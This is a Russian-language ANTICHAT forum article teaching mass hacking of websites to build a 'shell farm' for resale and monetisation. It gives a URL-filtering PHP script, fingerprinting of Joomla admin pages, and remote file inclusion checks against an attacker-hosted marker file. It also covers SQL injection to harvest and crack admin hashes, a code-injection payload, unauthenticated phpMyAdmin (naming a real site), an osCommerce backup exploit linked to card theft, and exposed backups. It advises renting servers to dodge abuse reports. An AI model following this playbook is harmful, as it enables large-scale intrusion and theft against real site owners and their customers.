GrabDuck

Авторские статьи - Массовый взлом сайтов 2012 | ANTICHAT

:

Здравствуйте, сегодня хотел бы рассказать об уникальном способе как обзавестись "фермой шеллов" на своем компьютере.
Информация будет полезна как для новичков так и для профессионалов.
Начнем пожалуй.

Предыстория.
Как сейчас ломают сайты? Ждут пока какая то бага выйдет в паблик, вбивают в гугл dorkи что бы найти похожие сайты и пытаются ручками искать уязвимые сайты.
Более умные люди запускают хрефер и парсят все виды dorkов этой уявимости, выбирают самые жирные и опять же ручками вбивают сайты. Самые про делают все это
автоматически. Представьте сколько раз проверяются одни и те же сайты на одну уязвимость. Я даже для интереса на своем сайте создал страницу с якобы новой уязвимостью
вордперсс которая вышла в паблик и добавил пару ссылок в сапу и добавил метрику, ко мне пришло 112 посетителей за неделю) Я был удивлен, что столько людей еще
занимается этим не благодарным делом собственно это и заставило меня открыть блокнот и писать.

Теория.
Практически все пути к уязвимостям wordpress начинаются с /wp-content/plugins/* Вы только представьте количество сайтов в которых закрыта директория /wp-content/, особенно
на жирных шеллах. Мы не будем брать пару сотен сайтов с гугла и пытаться их ковырять, мы будем брать огромную базу сайтов и выбирать из них только те в которых 100% работает уязвимость!
Для начала нам нужно определиться для чего нам нужны шеллы и какие факторы нам важны.
Если мы хотим траффистые шеллы, то нам нужно брать базу liveinternet, top.mail.ru и hotlog. Что бы после взлома сразу видеть количество траффа на счетчиках и не тратить время на шлак.
Если мы хотим ТиЦевые шеллы (продвижение, доры, биржы ссылок и т.д.) то нам нужно брать базы ЯК и ДМОЗ, что бы даже если будет маленький тиц, то все равно присутствие в этих каталогах очень поможет нам.

Практика.
Возьмем к примеру Joomla, к ней огромное количество уязвимостей. Гемора с ней будет много, но он оправдан, так как и профит с этого будет не малый.
Берем к примеру базу ЯК и ДМОЗ, ЯК примерно 80к и ДМОЗ примерно 3кк вроде. Ну весь ДМОЗ нам нет смысла парсить если мы работаем по СНГ, то можно
просто выпарсить из него сайты определенных зон (тоже самое и для бурж) для этого поможет банальный скрипт:

PHP:

<?php
$f 
file('file.txt'); // файл с урлами
$maps=fopen('gov.txt''a');  // файл куда сохранять
$mask '.gov'//что ищем
foreach($f as $value)
{
if(
strpos($value$mask))
{
fwrite($maps$value."\n");
}
}
fclose($maps);
?> 

В нем думаю более чем понятно все, выбираем зоны .ru .ua .by .kz запихиваем все в один файл и наша мини база готова.
Теперь нам нужна программка которая будет заходить на страницы сайта и проверять на этих страницах наличие нужного нам текста.
Скачать программу можно: ссыль

Что бы прогнать всю базу, по всем багам джумлы, нужно найти из огромной базы только сайты работающие на Joomla.
Для этого в программе делаем все страницы одного вида:
http://site.ru/administrator/index.php
http://site2.ru/administrator/index.php
Тем кто умеет пользоваться блокнотом это будет легко, а кто нет - придется поучиться) Видео на Youtube: ссыль
В видео я как раз пользуюсь скриптом выше и делаю нормальные ссылки.

Почему именно директория /administrator/ некоторые же переименовывают директория админки? Дык нам то все равно нужен будет доступ в админку
после того как мы взломаем пароль админа, намного хуже будет взломать все пароли, а потом окажется что нет админки или эта папка закрыта .htaccess по IP.
В файле /administrator/index.php должна быть какая то фраза которая есть во всех админках Joomla, вот к примеру:

HTML:

<label for="modlgn_username">Логин</label>
Запускаем прогу, ложим базу в файл urls.txt и вот как у нас будет выглядеть настройка программы:

[​IMG]

Что ж парсинг начался, кстати объяснения насчет программы будет в конце статьи.

После того как мы собрали базу сайтов Joomla есть несколько способов взлома.
1-й: Брут. Очень банально, но в таких базах часто попадаются вкусные шеллы. Брутов под каждую cms сейчас завались, поэтому юзайте поиск и дерзайте.
2-й: RFI. Заливаем на свой сервер файл s.php с кодом

PHP:

<? echo'oko30ro'?>

ставим все ссылки в виде http://site.ru/rfi=http://nash-site.ru/s.php?
и в программе вбиваем поиск фразы oko30ro соответственно получаем все уязвимые файлы.
3-й: SQL. Парсим все уязвимости SQL под Joomla делаем из базы вид:
http://site1.ru/sql
http://site1.ru/sql2
http://site2.ru/sql
http://site2.ru/sql2
и т.д.
И в программе вбиваем Super Administrator на выходе получаем все сайты с зашифрованными паролями главного администратора.
Заходим на сайтик cmd5.ru пополняем счет и ломаем пароли (это не мой сайт, но очень хотелось его прорекламировать не раз выручал меня).
4-й: code inj. То есть все уязвимости в которых мы можем выполнить свой php код. Пример: /index.php?searchword=";phpinfo();%23&option=com_search&Itemid=1
В настройках программы вбиваем один из параметров phpinfo() который высвечивается всегда, например: max_file_uploads и получаем уязвимые сайты.

Актуальные дорки найденные мной.
SQL: Почитав одну из тем про раскрутку скулей, мы можем выписать основные ошибки которые показывает на уязвимых сайтах, к примеру вот:
mysql_query(): You have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use near '1''
Теперь берем всю базу и ставим сайтам ссылки в виде news.php?id='1 или index.php?id='1 в общем перечислять эти параметры можно долго.
Вбиваем в программу mysql_query(): You have an error in your SQL и чекаем, выходе получаем огромную кучу уязвимых сайтов. Дальше эти сайты закидываем в какой нибудь
автоматический раскрутчик скулей (таких куча даже в соседних темах) и имеем большое количество уязвимых сайтов.
Тоже самое кстати касается и RFI, только там нужно вставлять ссылки типа index.php?page=evil, index.php?file=evil, news.php?page=evil и т.д.

phpmyadmin: Ему нужно уделить особое внимание, как минимум потому что практически на каждом 10-том сайте он установлен. Основные дорки это:
/phpmyadmin/
/phpMyAdmin/
/pma/
/myadmin/
/sql/
И он очень дырявый. Причем у некоторых даже стоит phpmyadmin без авторизации, получается что то типа этого: http://bel-shkola.ru/phpMyAdmin/index.php
это же просто вызов для нас!! Заходим в код, смотрим что на всех сайтах с открытым доступом присутствует код var pma_absolute_uri = вбиваем в программу и погнали.

Oscommerce: Есть на него отличные баги http://www.exploit-db.com/exploits/12857/ особенно /admin/backup.php/login.php?action=backup
сколько ж денег на СС было заработано с этим багом, даже вспоминать страшно. Не давно увидел, что еще куча сайтов не фиксило эту дырку и можно продолжать бомбить, главное что это удобно и не занимает много времени. Но в этой CMS есть еще одна приятная особенность, можно сделав пару движений отослать всем клиентам рассылку, а что именно отсылать я расскажу в следующей статье.

backup: Многие сайты оставляют свои бэкапы в директориях /backup/, /backups/, /admin/backup/ и не закрывают эту директорию в .htaccess Опять же это вызов для нас)
Делаем все ссылки, вбиваем в программу Parent Directory и запускаем. Потом отпарсенные сайты можно еще раз пропустить через программу и вбить .sql, что бы отбросить весь шлак.

Программа объяснения и описание.
Эту программу написал для меня друг "на коленке" еще года 3-4 назад, не знаю что бы я делал без нее. Пытался искать аналоги, но во всех них есть какой то изъян, то размер большой, то на виртуалке не пашет, то чекает с регистром, короче для наших нужд эта прога подходит идеально.
Дублирую ссылку на программу: ссыль

Не много о настройке программы, есть 4 файла:
check.exe - соответственно сам чекер.
urls.txt - наши урлы
UA.txt - все виды User-agentы различных браузеров, что бы сильно не светиться.
results.txt - куда сохраняются гуды.
Кстати немного подробнее о сохранении, весь результат сохраняется в файле в виде:
http://site.ru/index.php;IP сайта
http://site2.ru/index.php;IP2 сайта
то есть что бы быстро из файла вытащить только линки, нам нужно знать Excel. Придется снимать еще одно видео, так как если словами объяснить будет куча вопросов как всегда.
Видео: ссыль

Где лучше запускать программу? Я советую запускать программу только на дедике и лучше покупать нормальный дедик, а не "однобаксовые", так как от оперативки и канала зависит скорость нашей программы. Будете запускать на компе получите абузу и матов выслушаете от провайдера столько, что уши завянут. Когда на своем компе запускал, мне вообще провайдер инет выключил и сказал у меня троян и что бы я проверил антивирусом комп.
Еще один минус запуска этой программы на своем компьютере, она очень сильно жрет оперативу.
Скорость программы примерно от 500к до 3кк ссылок в день (зависит от дедика). Лучше покупать сразу несколько дедиков хороших, это единственный расходный материал и на нем экономить нельзя.

Сколько потоков ставить? Ставим 100-300 потоков, опять же зависит от дедика. Если на плохом дедике поставить сразу 300 потоков, то через где то 50к чеканных сайтов вам выкинет ошибку и придется запускать заново.

Базы.
Где же брать нам эти заветные базы? Парсить, а что еще делать. Со мной работал очень хороший человек, который примерно на протяжении 3 лет парсил мне линки из различных сайтов за копейки. И у меня рука просто не поднимется, вот так взять и выложить все его базы в паблик, поэтому я предложил этому человеку собрать все базы, что он для меня собирал и выложить на plati.ru. Пообщавшись он решил сделать ценник в 50$, цена смешная если честно. Базы собраны примерно с конца 2011 и по июль 2012, собирать с заново новые базы просто не вижу смысла, актуальность все равно 95% Знаю для не которых эта сумма может показаться не малой, поэтому советую начинать с паблик баз для начала и на продажах шеллов поднять этот полтинник. Или же пытаться парсить самому.
Ссылка на покупку и описание: ссыль

Итоги.
По СНГ этим методом я работал только по уязвимостям phpmyadmin, поэтому у вас есть еще огромная зона для боевых действий)
Я бы честно никогда не выложил бы свой способ взлома, были времена примерно 1-2 года назад, когда я хотел сделать платный курс поэтому методу со всеми базами и дирками в стиле "кнопка бабло", но когда дошел до раздела "почему я продаю этот курс" и какая будет цена. Я честно неделю думал на счет этого и после очередного удачного сервера .edu понял, что незачем продавать вообще и курс удачно ушел в корзину. Прелесть нашего метода в том, что он никогда не умрет. Каждый день появляются все новые и новые уязвимости, которыми люди пытаются ломать сайты через гугл, потом после нескольких шеллов думают, что тема изжила себя и выкладывают в паблик и тут приходим мы и выжимаем все самые соки, а если у людей есть немного логики и хитрых идея, то это просто золотая жила.
Сейчас в жизни пришел момент, когда взлом переходит из категории заработок в категорию хобби, поэтому и не видел смысла хранить это на своем компьютере. Так же сейчас пишу статью по "Монетизации шеллов" версии v.2 ожидайте.

В принципе покаместь все, но конечно буду добавлять больше дорков и интересностей по мере их поступления в этой теме.Я далеко не оратор, поэтому если вам что то не понятно пишите постараюсь эти пункты излагать более понятно для всех.
Удачи!

Автор: FlooP1k специально для Античат.